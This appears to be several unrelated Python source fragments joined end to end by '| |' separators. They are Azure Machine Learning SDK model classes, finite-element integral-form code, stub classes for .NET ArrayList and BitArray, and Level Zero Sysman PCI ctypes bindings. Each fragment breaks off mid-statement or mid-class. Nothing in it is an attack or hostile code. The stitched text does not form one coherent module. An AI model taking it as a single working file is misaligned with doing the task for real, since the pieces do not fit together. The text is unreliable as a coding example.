:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
*,
private_endpoint: Optional["PrivateEndpoint"] = None,
private_link_service_connection_state: Optional["PrivateLinkServiceConnectionState"] = None,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = None
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
required_zone_names: Optional[List[str]] = None,
**kwargs
):
super(PrivateLinkResource, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = required_zone_names
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~azure.mgmt.machinelearningservices.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
*,
value: Optional[List["PrivateLinkResource"]] = None,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = value
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected", "Disconnected",
"Timeout".
:type status: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[Union[str, "PrivateEndpointServiceConnectionStatus"]] = None,
description: Optional[str] = None,
actions_required: Optional[str] = None,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = status
self.description = description
self.actions_required = actions_required
class QuotaBaseProperties(msrest.serialization.Model):
"""The properties for Quota update or retrieval.
:param id: Specifies the resource ID.
:type id: str
:param type: Specifies the resource type.
:type type: str
:param limit: The maximum permitted quota of the resource.
:type limit: long
:param unit: An enum describing the unit of quota measurement. Possible values include:
"Count".
:type unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
type: Optional[str] = None,
limit: Optional[int] = None,
unit: Optional[Union[str, "QuotaUnit"]] = None,
**kwargs
):
super(QuotaBaseProperties, self).__init__(**kwargs)
self.id = id
self.type = type
self.limit = limit
self.unit = unit
class QuotaUpdateParameters(msrest.serialization.Model):
"""Quota update parameters.
:param value: The list for update quota.
:type value: list[~azure.mgmt.machinelearningservices.models.QuotaBaseProperties]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[QuotaBaseProperties]'},
}
def __init__(
self,
*,
value: Optional[List["QuotaBaseProperties"]] = None,
**kwargs
):
super(QuotaUpdateParameters, self).__init__(**kwargs)
self.value = value
class RegistryListCredentialsResult(msrest.serialization.Model):
"""RegistryListCredentialsResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location:
:vartype location: str
:ivar username:
:vartype username: str
:param passwords:
:type passwords: list[~azure.mgmt.machinelearningservices.models.Password]
"""
_validation = {
'location': {'readonly': | |
necessary
if f_loc is None:
if n_samples is None:
f_loc = np.zeros(n_dofs_test)
else:
f_loc = np.zeros((n_dofs_test,n_samples))
# Update form
f_loc += np.dot(test.T, wKer)
elif self.type=='bilinear':
#
# Bilinear form
#
# Test functions evaluated at Gauss nodes
n_dofs_test = self.test.dofhandler().element.n_dofs()
test = phi[region][self.test]
# Trial functions evaluated at Gauss nodes
n_dofs_trial = self.trial.dofhandler().element.n_dofs()
trial = phi[region][self.trial]
#
# Initialize local matrix if necessary
#
if f_loc is None:
#
# Initialize form
#
if n_samples is None:
f_loc = np.zeros((n_dofs_test,n_dofs_trial))
else:
f_loc = np.zeros((n_dofs_test,n_dofs_trial,n_samples))
#
# Update form
#
if n_samples is None:
#
# Deterministic kernel
#
'''
f_loc_det = np.dot(test.T, np.dot(np.diag(wg[region]*Ker),trial))
f_loc += f_loc_det.reshape((n_dofs_test*n_dofs_trial,), order='F')
'''
f_loc += np.dot(test.T, np.dot(np.diag(wg[region]*Ker),trial))
else:
#
# Sampled kernel
#
'''
f_loc_smp = []
for i in range(n_dofs_trial):
f_loc_smp.append(np.dot(test.T, (trial[:,i]*wKer.T).T))
f_loc += np.concatenate(f_loc_smp, axis=0)
'''
for i in range(n_dofs_trial):
f_loc[:,i,:] += np.dot(test.T, (trial[:,i]*wKer.T).T)
#
# Initialize zero local matrix if necessary
#
if f_loc is None:
if self.type == 'constant':
#
# Constant form
#
if n_samples is None:
#
# Deterministic form
#
f_loc = 0
else:
#
# Sampled form
#
f_loc = np.zeros(n_samples)
elif self.type=='linear':
#
# Linear form
#
n_dofs_test = self.test.dofhandler().element.n_dofs()
if n_samples is None:
#
# Deterministic form
#
f_loc = np.zeros(n_dofs_test)
else:
#
# Sampled form
#
f_loc = np.zeros((n_dofs_test, n_samples))
elif self.type=='bilinear':
#
# Bilinear form
#
n_dofs_test = self.test.dofhandler().element.n_dofs()
n_dofs_trial = self.trial.dofhandler().element.n_dofs()
if n_samples is None:
#
# Deterministic form
#
f_loc = np.zeros((n_dofs_test, n_dofs_trial))
else:
#
# Sampled form
#
f_loc = np.zeros((n_dofs_test, n_dofs_trial, n_samples))
#
# Return f_loc
#
return f_loc
"""
for region in regions:
n_samples = kernel.n_samples
if self.test is not None:
#
# Need test function
#
drv = parse_derivative_info(self.test.derivative)
test_etype = self.test.element.element_type()
test = phi[region][test_etype][drv]
n_dofs_test = test.shape[1]
if self.trial is not None:
#
# Need trial function
#
drv = parse_derivative_info(self.trial.derivative)
trial_etype = self.trial.element.element_type()
trial = phi[region][trial_etype][drv]
n_dofs_trial = trial.shape[1]
#
# Bilinear form
#
if n_samples is None:
#
# Deterministic Kernel
#
f_loc = np.dot(test.T, np.dot(np.diag(wg[region]*Ker),trial))
f_loc.reshape((n_dofs_test*n_dofs_trial,1), order='F')
else:
#
# Sampled kernel
#
f_loc = np.dot(test.T, np.reshape(np.kron(trial, wKer),(n_gauss,-1), order='F'))
f_loc.reshape((n_dofs_test*n_dofs_trial, n_samples), order='F')
#
# Extract local dofs
#
rows, cols = np.meshgrid(np.arange(n_dofs_test),
np.arange(n_dofs_trial),
indexing='ij')
rows = rows.ravel()
cols = cols.ravel()
return f_loc, rows, cols
else:
#
# Linear Form
#
rows = np.arange(n_dofs_test)
return f_loc, rows
else:
#
# Simple integral
#
f_loc =
return f_loc
"""
class IIForm(Form):
"""
Bilinear form arising from the interpolatory approximation of an integral
operator.
Cu(x) = I_D k(x,y) u(y) dy
Ku(x)_i = I_D k(xi,y) u(y) dy, i=1,...,n_dofs
"""
def __init__(self, kernel=None, trial=None, test=None, dmu='dx', flag=None):
"""
Constructor
Inputs:
*kernel: Kernel, specifying the form's kernel
*trial: Basis, basis function representing the trial space
*test: Basis, basis function representing the test space
*dmu: str, area of integration
'dx' - integrate over a cell
'ds' - integrate over an edge
'dv' - integrate over a vertex
*flag: str/int/tuple cell/half_edge/vertex marker
"""
#
# Initialize form
#
Form.__init__(self, kernel=kernel, trial=trial, test=test,
dmu=dmu, flag=flag)
#
# Checks
#
assert trial is not None and test is not None,\
'Both trial and test functions should be specified.'
def eval(self, cell, xg, wg, phi, dofs):
"""
Evaluate the local bilinear form
I_{Ej} k(xi, y) phij(y)dy phii(x) for all dof-vertices xi
where Ej is a mesh cell
Inputs:
cell: Cell, containing subregions over which Form is defined
x: (n, dim) array of interpolation points over mesh
xg: Gaussian quadrature points
wg: Gaussian quadrature weights
phi: shape functions evaluated at quadrature points
"""
# =====================================================================
# Interpolate in the test function component
# =====================================================================
test = self.test
x = test.dofhandler().get_dof_vertices(test.subforest_flag())
n = x.shape[0]
# =====================================================================
# Specify trial function
# =====================================================================
trial = self.trial
# Number of dofs
n_dofs = trial.dofhandler().element.n_dofs()
f_loc = None
for reg in self.regions(cell):
# Get trial functions evaluated at Gauss nodes
phi_g = phi[reg][trial]
x_g = xg[reg]
w_g = wg[reg]
#
# Initialize local matrix if necessary
#
if f_loc is None:
#
# Initialize form
#
f_loc = np.zeros((n,n_dofs))
#
# Evaluate covariance function at the local Gauss points
#
n_gauss = x_g.shape[0]
ii,jj = np.meshgrid(np.arange(n),np.arange(n_gauss), indexing='ij')
x = (x[ii.ravel(),:],x_g[jj.ravel(),:])
"""
if self.dim == 1:
x1, x2 = x[ii.ravel()], x_g[jj.ravel()]
elif self.dim == 2:
"""
C_loc = self.kernel.eval(x, region=reg, cell=cell,
phi=phi[reg], dofs=dofs[reg])
C_loc = C_loc.reshape(n,n_gauss)
#
# Compute local integral
#
# Weight shape functions
Wphi = np.diag(w_g).dot(phi_g)
# Combine
f_loc += C_loc.dot(Wphi)
return f_loc
class IPForm(Form):
"""
Bilinear form arising from the projection based approximation of an integral
operator.
Cu(x) = I_D k(x,y) u(y) dy
Kij = I_D I_D k(x,y) phij(y)dy phii(x) dx,
Note: The approximation of Cu(x) is given by
Cu(x) ~= M^{-1} K u
"""
def __init__(self, kernel=None, trial=None, test=None, dmu='dx', flag=None):
"""
Constructor
Inputs:
*kernel: Kernel, specifying the form's kernel
*trial: Basis, basis function representing the trial space
*test: Basis, basis function representing the test space
*dmu: str, area of integration
'dx' - integrate over a cell
'ds' - integrate over an edge
'dv' - integrate over a vertex
*flag: str/int/tuple cell/half_edge/vertex marker
"""
#
# Initialize form
#
Form.__init__(self, kernel=kernel, trial=trial, test=test, dmu=dmu, flag=flag)
#
# Checks
#
assert trial is not None and test is not None,\
'Integral forms have both test and trial functions'
for f in kernel.f():
assert f.n_variables()==2, 'Integral kernel must be bivariate.'
def eval(self, cells, xg, wg, phi, dofs):
"""
Evaluates the local bilinear form
I_{Ei} I_{Ej} k(x,y) phij(y) dy phii(x) dx,
where Ei, Ej are mesh cells
Inputs:
cells: Cells (2,) pair, containing subregions over which Form is defined
xg: dict, (2,) pair of Gaussian quadrature points
wg: dict, (2,) pair of Gaussian quadrature weights
phi: (2,) pair of shape functions evaluated at quadrature points
"""
# Cells
ci, cj = cells
# Determine integration regions
regi = self.regions(ci)
regj = self.regions(cj)
# =====================================================================
# Specify the test and trial functions
# =====================================================================
test = self.test
trial = self.trial
# Degrees of freedom
n_dofsi = self.test.dofhandler().element.n_dofs()
n_dofsj = self.trial.dofhandler().element.n_dofs()
# Sample size
n_samples = self.kernel.n_subsample()
f_loc = None
for regi in self.regions(ci):
for regj in self.regions(cj):
# Access test(i) and trial(j) functions
phii = phi[0][regi][test]
phij = phi[1][regj][trial]
# Get quadrature nodes
xi_g = xg[0][regi]
xj_g = xg[1][regj]
# Get quadrature weights
wi_g = wg[0][regi]
wj_g = wg[1][regj]
# Get dofs
dofi = dofs[0][regi]
dofj = dofs[1][regj]
#
# Initialize local matrix if necessary
#
if f_loc is None:
#
# Initialize form
#
if n_samples==1:
f_loc = np.zeros((n_dofsi,n_dofsj))
else:
f_loc = np.zeros((n_dofsi,n_dofsj,n_samples))
#
# Evaluate kernel function at the local Gauss points
#
n_gauss = xi_g.shape[0]
ig = np.arange(n_gauss)
ii,jj = np.meshgrid(ig,ig,indexing='ij')
x = (xi_g[ii.ravel(),:],xj_g[jj.ravel(),:])
"""
if self.dim() == 1:
x1, x2 = xi_g[ii.ravel()], xj_g[jj.ravel()]
elif self.dim() == 2:
x1, x2 = xi_g[ii.ravel(),:],xj_g[jj.ravel(),:]
"""
#x, phi=None, cell=None, region=None, dofs=None)
C_loc = self.kernel.eval(x, cell=(ci,cj), region=(regi, regj),
phi=(phi[0][regi],phi[1][regj]),
dofs=(dofi,dofj))
C_loc = C_loc.reshape(n_gauss,n_gauss)
#
# Compute local integral
#
# Weight shape functions
Wphii = np.diag(wi_g).dot(phii)
Wphij = np.diag(wj_g).dot(phij)
# Combine
f_loc += np.dot(Wphii.T, C_loc.dot(Wphij))
# Return local form
return f_loc
'''
class IForm(Form):
"""
Bilinear form for an integral operator
Cu(x) = I_D k(x,y) u(y) dy
TODO: Replace with IIForm and IPForm
"""
def __init__(self, kernel, trial=None, test=None, dmu='dx', flag=None,
form_type='projection'):
"""
Constructor
Inputs:
*kernel: Kernel, specifying the form's kernel
*trial: Basis, basis function representing the trial space
*test: Basis, basis function representing the test space
*dmu: str, area of integration
'dx' - integrate over a cell
'ds' - integrate over an edge
*flag: str/int/tuple cell/half_edge/vertex marker
*approximation_type: str ('projection' or 'interpolation').
"""
self.type = 'bilinear'
self.flag = flag
#
# Trial space
#
assert isinstance(trial, Basis),\
'Input "trial" should be of type "Basis".'
self.trial = trial
# Dimension
self.__dim = self.trial.element.dim()
#
# Test space
#
assert isinstance(test, Basis),\
'Input "test" should be of type "Basis".'
self.test = test
#
# Check | |
value can be null.
"""
pass
def InsertRange(self,index,c):
"""
InsertRange(self: ArrayList,index: int,c: ICollection)
Inserts the elements of a collection into the System.Collections.ArrayList at the specified index.
index: The zero-based index at which the new elements should be inserted.
c: The System.Collections.ICollection whose elements should be inserted into the System.Collections.ArrayList. The collection itself cannot be null,but it can contain
elements that are null.
"""
pass
def LastIndexOf(self,value,startIndex=None,count=None):
"""
LastIndexOf(self: ArrayList,value: object) -> int
Searches for the specified System.Object and returns the zero-based index of the last occurrence within the entire System.Collections.ArrayList.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
Returns: The zero-based index of the last occurrence of value within the entire the System.Collections.ArrayList,if found; otherwise,-1.
LastIndexOf(self: ArrayList,value: object,startIndex: int) -> int
Searches for the specified System.Object and returns the zero-based index of the last occurrence within the range of elements in the System.Collections.ArrayList that
extends from the first element to the specified index.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the backward search.
Returns: The zero-based index of the last occurrence of value within the range of elements in the System.Collections.ArrayList that extends from the first element to startIndex,if
found; otherwise,-1.
LastIndexOf(self: ArrayList,value: object,startIndex: int,count: int) -> int
Searches for the specified System.Object and returns the zero-based index of the last occurrence within the range of elements in the System.Collections.ArrayList that
contains the specified number of elements and ends at the specified index.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the backward search.
count: The number of elements in the section to search.
Returns: The zero-based index of the last occurrence of value within the range of elements in the System.Collections.ArrayList that contains count number of elements and ends at
startIndex,if found; otherwise,-1.
"""
pass
@staticmethod
def ReadOnly(list):
"""
ReadOnly(list: IList) -> IList
Returns a read-only System.Collections.IList wrapper.
list: The System.Collections.IList to wrap.
Returns: A read-only System.Collections.IList wrapper around list.
ReadOnly(list: ArrayList) -> ArrayList
Returns a read-only System.Collections.ArrayList wrapper.
list: The System.Collections.ArrayList to wrap.
Returns: A read-only System.Collections.ArrayList wrapper around list.
"""
pass
def Remove(self,obj):
"""
Remove(self: ArrayList,obj: object)
Removes the first occurrence of a specific object from the System.Collections.ArrayList.
obj: The System.Object to remove from the System.Collections.ArrayList. The value can be null.
"""
pass
def RemoveAt(self,index):
"""
RemoveAt(self: ArrayList,index: int)
Removes the element at the specified index of the System.Collections.ArrayList.
index: The zero-based index of the element to remove.
"""
pass
def RemoveRange(self,index,count):
"""
RemoveRange(self: ArrayList,index: int,count: int)
Removes a range of elements from the System.Collections.ArrayList.
index: The zero-based starting index of the range of elements to remove.
count: The number of elements to remove.
"""
pass
@staticmethod
def Repeat(value,count):
"""
Repeat(value: object,count: int) -> ArrayList
Returns an System.Collections.ArrayList whose elements are copies of the specified value.
value: The System.Object to copy multiple times in the new System.Collections.ArrayList. The value can be null.
count: The number of times value should be copied.
Returns: An System.Collections.ArrayList with count number of elements,all of which are copies of value.
"""
pass
def Reverse(self,index=None,count=None):
"""
Reverse(self: ArrayList)
Reverses the order of the elements in the entire System.Collections.ArrayList.
Reverse(self: ArrayList,index: int,count: int)
Reverses the order of the elements in the specified range.
index: The zero-based starting index of the range to reverse.
count: The number of elements in the range to reverse.
"""
pass
def SetRange(self,index,c):
"""
SetRange(self: ArrayList,index: int,c: ICollection)
Copies the elements of a collection over a range of elements in the System.Collections.ArrayList.
index: The zero-based System.Collections.ArrayList index at which to start copying the elements of c.
c: The System.Collections.ICollection whose elements to copy to the System.Collections.ArrayList. The collection itself cannot be null,but it can contain elements that are
null.
"""
pass
def Sort(self,*__args):
"""
Sort(self: ArrayList)
Sorts the elements in the entire System.Collections.ArrayList.
Sort(self: ArrayList,comparer: IComparer)
Sorts the elements in the entire System.Collections.ArrayList using the specified comparer.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- A null reference (Nothing in Visual Basic) to use the System.IComparable implementation
of each element.
Sort(self: ArrayList,index: int,count: int,comparer: IComparer)
Sorts the elements in a range of elements in System.Collections.ArrayList using the specified comparer.
index: The zero-based starting index of the range to sort.
count: The length of the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- A null reference (Nothing in Visual Basic) to use the System.IComparable implementation
of each element.
"""
pass
@staticmethod
def Synchronized(list):
"""
Synchronized(list: IList) -> IList
Returns an System.Collections.IList wrapper that is synchronized (thread safe).
list: The System.Collections.IList to synchronize.
Returns: An System.Collections.IList wrapper that is synchronized (thread safe).
Synchronized(list: ArrayList) -> ArrayList
Returns an System.Collections.ArrayList wrapper that is synchronized (thread safe).
list: The System.Collections.ArrayList to synchronize.
Returns: An System.Collections.ArrayList wrapper that is synchronized (thread safe).
"""
pass
def ToArray(self,type=None):
"""
ToArray(self: ArrayList) -> Array[object]
Copies the elements of the System.Collections.ArrayList to a new System.Object array.
Returns: An System.Object array containing copies of the elements of the System.Collections.ArrayList.
ToArray(self: ArrayList,type: Type) -> Array
Copies the elements of the System.Collections.ArrayList to a new array of the specified element type.
type: The element System.Type of the destination array to create and copy elements to.
Returns: An array of the specified element type containing copies of the elements of the System.Collections.ArrayList.
"""
pass
def TrimToSize(self):
"""
TrimToSize(self: ArrayList)
Sets the capacity to the actual number of elements in the System.Collections.ArrayList.
"""
pass
def __add__(self,*args):
""" x.__add__(y) <==> x+y """
pass
def __contains__(self,*args):
"""
__contains__(self: IList,value: object) -> bool
Determines whether the System.Collections.IList contains a specific value.
value: The object to locate in the System.Collections.IList.
Returns: true if the System.Object is found in the System.Collections.IList; otherwise,false.
"""
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __len__(self,*args):
""" x.__len__() <==> len(x) """
pass
@staticmethod
def __new__(self,*__args):
"""
__new__(cls: type)
__new__(cls: type,capacity: int)
__new__(cls: type,c: ICollection)
"""
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
Capacity=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the number of elements that the System.Collections.ArrayList can contain.
Get: Capacity(self: ArrayList) -> int
Set: Capacity(self: ArrayList)=value
"""
Count=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the number of elements actually contained in the System.Collections.ArrayList.
Get: Count(self: ArrayList) -> int
"""
IsFixedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Collections.ArrayList has a fixed size.
Get: IsFixedSize(self: ArrayList) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Collections.ArrayList is read-only.
Get: IsReadOnly(self: ArrayList) -> bool
"""
IsSynchronized=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether access to the System.Collections.ArrayList is synchronized (thread safe).
Get: IsSynchronized(self: ArrayList) -> bool
"""
SyncRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object that can be used to synchronize access to the System.Collections.ArrayList.
Get: SyncRoot(self: ArrayList) -> object
"""
class BitArray(object):
"""
Manages a compact array of bit values,which are represented as Booleans,where true indicates that the bit is on (1) and false indicates the bit is off (0).
BitArray(length: int)
BitArray(length: int,defaultValue: bool)
BitArray(bytes: Array[Byte])
BitArray(values: Array[bool])
BitArray(values: Array[int])
BitArray(bits: BitArray)
"""
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return BitArray()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def And(self,value):
"""
And(self: BitArray,value: BitArray) -> BitArray
Performs the bitwise | |
[out] Indicates if ::zes_pci_stats_t.packetCounter will have valid
## values
("haveReplayCounters", ze_bool_t) ## [out] Indicates if ::zes_pci_stats_t.replayCounter will have valid
## values
]
###############################################################################
## @brief PCI link status
class zes_pci_link_status_v(IntEnum):
UNKNOWN = 0 ## The link status could not be determined
GOOD = 1 ## The link is up and operating as expected
QUALITY_ISSUES = 2 ## The link is up but has quality and/or bandwidth degradation
STABILITY_ISSUES = 3 ## The link has stability issues and preventing workloads making forward
## progress
class zes_pci_link_status_t(c_int):
def __str__(self):
return str(zes_pci_link_status_v(self.value))
###############################################################################
## @brief PCI link quality degradation reasons
class zes_pci_link_qual_issue_flags_v(IntEnum):
REPLAYS = ZE_BIT(0) ## A significant number of replays are occurring
SPEED = ZE_BIT(1) ## There is a degradation in the maximum bandwidth of the link
class zes_pci_link_qual_issue_flags_t(c_int):
def __str__(self):
return hex(self.value)
###############################################################################
## @brief PCI link stability issues
class zes_pci_link_stab_issue_flags_v(IntEnum):
RETRAINING = ZE_BIT(0) ## Link retraining has occurred to deal with quality issues
class zes_pci_link_stab_issue_flags_t(c_int):
def __str__(self):
return hex(self.value)
###############################################################################
## @brief Dynamic PCI state
class zes_pci_state_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in][optional] pointer to extension-specific structure
("status", zes_pci_link_status_t), ## [out] The current status of the port
("qualityIssues", zes_pci_link_qual_issue_flags_t), ## [out] If status is ::ZES_PCI_LINK_STATUS_QUALITY_ISSUES,
## then this gives a combination of ::zes_pci_link_qual_issue_flag_t for
## quality issues that have been detected;
## otherwise, 0 indicates there are no quality issues with the link at
## this time."
("stabilityIssues", zes_pci_link_stab_issue_flags_t), ## [out] If status is ::ZES_PCI_LINK_STATUS_STABILITY_ISSUES,
## then this gives a combination of ::zes_pci_link_stab_issue_flag_t for
## reasons for the connection instability;
## otherwise, 0 indicates there are no connection stability issues at
## this time."
("speed", zes_pci_speed_t) ## [out] The current port configure speed
]
###############################################################################
## @brief PCI bar types
class zes_pci_bar_type_v(IntEnum):
MMIO = 0 ## MMIO registers
ROM = 1 ## ROM aperture
MEM = 2 ## Device memory
class zes_pci_bar_type_t(c_int):
def __str__(self):
return str(zes_pci_bar_type_v(self.value))
###############################################################################
## @brief Properties of a pci bar
class zes_pci_bar_properties_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in,out][optional] pointer to extension-specific structure
("type", zes_pci_bar_type_t), ## [out] The type of bar
("index", c_ulong), ## [out] The index of the bar
("base", c_ulonglong), ## [out] Base address of the bar.
("size", c_ulonglong) ## [out] Size of the bar.
]
###############################################################################
## @brief Properties of a pci bar, including the resizable bar.
class zes_pci_bar_properties_1_2_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in,out][optional] pointer to extension-specific structure
("type", zes_pci_bar_type_t), ## [out] The type of bar
("index", c_ulong), ## [out] The index of the bar
("base", c_ulonglong), ## [out] Base address of the bar.
("size", c_ulonglong), ## [out] Size of the bar.
("resizableBarSupported", ze_bool_t), ## [out] Support for Resizable Bar on this device.
("resizableBarEnabled", ze_bool_t) ## [out] Resizable Bar enabled on this device
]
###############################################################################
## @brief PCI stats counters
##
## @details
## - Percent replays is calculated by taking two snapshots (s1, s2) and
## using the equation: %replay = 10^6 * (s2.replayCounter -
## s1.replayCounter) / (s2.maxBandwidth * (s2.timestamp - s1.timestamp))
## - Percent throughput is calculated by taking two snapshots (s1, s2) and
## using the equation: %bw = 10^6 * ((s2.rxCounter - s1.rxCounter) +
## (s2.txCounter - s1.txCounter)) / (s2.maxBandwidth * (s2.timestamp -
## s1.timestamp))
class zes_pci_stats_t(Structure):
_fields_ = [
("timestamp", c_ulonglong), ## [out] Monotonic timestamp counter in microseconds when the measurement
## was made.
## This timestamp should only be used to calculate delta time between
## snapshots of this structure.
## Never take the delta of this timestamp with the timestamp from a
## different structure since they are not guaranteed to have the same base.
## The absolute value of the timestamp is only valid during within the
## application and may be different on the next execution.
("replayCounter", c_ulonglong), ## [out] Monotonic counter for the number of replay packets (sum of all
## lanes). Will always be 0 if ::zes_pci_properties_t.haveReplayCounters
## is FALSE.
("packetCounter", c_ulonglong), ## [out] Monotonic counter for the number of packets (sum of all lanes).
## Will always be 0 if ::zes_pci_properties_t.havePacketCounters is
## FALSE.
("rxCounter", c_ulonglong), ## [out] Monotonic counter for the number of bytes received (sum of all
## lanes). Will always be 0 if
## ::zes_pci_properties_t.haveBandwidthCounters is FALSE.
("txCounter", c_ulonglong), ## [out] Monotonic counter for the number of bytes transmitted (including
## replays) (sum of all lanes). Will always be 0 if
## ::zes_pci_properties_t.haveBandwidthCounters is FALSE.
("speed", zes_pci_speed_t) ## [out] The current speed of the link (sum of all lanes)
]
###############################################################################
## @brief Diagnostic results
class zes_diag_result_v(IntEnum):
NO_ERRORS = 0 ## Diagnostic completed without finding errors to repair
ABORT = 1 ## Diagnostic had problems running tests
FAIL_CANT_REPAIR = 2 ## Diagnostic had problems setting up repairs
REBOOT_FOR_REPAIR = 3 ## Diagnostics found errors, setup for repair and reboot is required to
## complete the process
class zes_diag_result_t(c_int):
def __str__(self):
return str(zes_diag_result_v(self.value))
###############################################################################
## @brief Diagnostic test index to use for the very first test.
ZES_DIAG_FIRST_TEST_INDEX = 0x0
###############################################################################
## @brief Diagnostic test index to use for the very last test.
ZES_DIAG_LAST_TEST_INDEX = 0xFFFFFFFF
###############################################################################
## @brief Diagnostic test
class zes_diag_test_t(Structure):
_fields_ = [
("index", c_ulong), ## [out] Index of the test
("name", c_char * ZES_STRING_PROPERTY_SIZE) ## [out] Name of the test
]
###############################################################################
## @brief Diagnostics test suite properties
class zes_diag_properties_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in,out][optional] pointer to extension-specific structure
("onSubdevice", ze_bool_t), ## [out] True if the resource is located on a sub-device; false means
## that the resource is on the device of the calling Sysman handle
("subdeviceId", c_ulong), ## [out] If onSubdevice is true, this gives the ID of the sub-device
("name", c_char * ZES_STRING_PROPERTY_SIZE), ## [out] Name of the diagnostics test suite
("haveTests", ze_bool_t) ## [out] Indicates if this test suite has individual tests which can be
## run separately (use the function ::zesDiagnosticsGetTests() to get the
## list of these tests)
]
###############################################################################
## @brief Accelerator engine groups
class zes_engine_group_v(IntEnum):
ALL = 0 ## Access information about all engines combined.
COMPUTE_ALL = 1 ## Access information about all compute engines combined. Compute engines
## can only process compute kernels (no 3D content).
